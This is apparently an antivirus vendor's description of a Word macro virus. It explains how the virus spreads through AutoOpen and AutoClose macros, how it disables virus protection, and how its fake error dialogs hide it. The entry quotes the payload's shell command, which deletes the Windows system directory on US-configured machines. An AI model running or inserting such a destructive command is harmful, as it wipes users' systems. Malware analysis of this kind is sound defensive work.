Class | Virus |
Platform | MSWord |
Description |
Technical DetailsThis is a non-polymorphic Word virus. The virus resides in the RedTerrorist module. It has seven subroutines: AutoOpen AutoClose FuckThemAll ToolsMacro ToolsCustomize ViewVBCode Delay The virus replicates when a document is opened or closed. AutoOpen, AutoClose:These procedures only call the main infection routine of the virus, which is in the FuckThemAll routine. Delay:This macro causes the system to pause before a message window is shown. For i = 0 To 19170000 Next FuckThemAll:Main virus routine. Checks system parameter ‘Country’ and if this is ‘US’ , it then then runs the command shell: "c:command.com C echo y | del " + Environ("windir") + "system*.* > nul" After that the virus sets the following parameters: .SaveNormalPrompt = False .VirusProtection = False .AllowFastSave = True .BackgroundSave = True The virus checks for the presence in the active document (or normal.dot) ToolsCustomize, ToolsMacro, ViewVBCode:These three routines are used for stealth; when executed they call the Delay routine and display Message Boxes: ToolsMacro: Top level process aborted, cannot continue ToolsCustomize Configuration too large for memory ViewVBCode Error in EXE file, program too big to fit in memory |
Find out the statistics of the threats spreading in your region |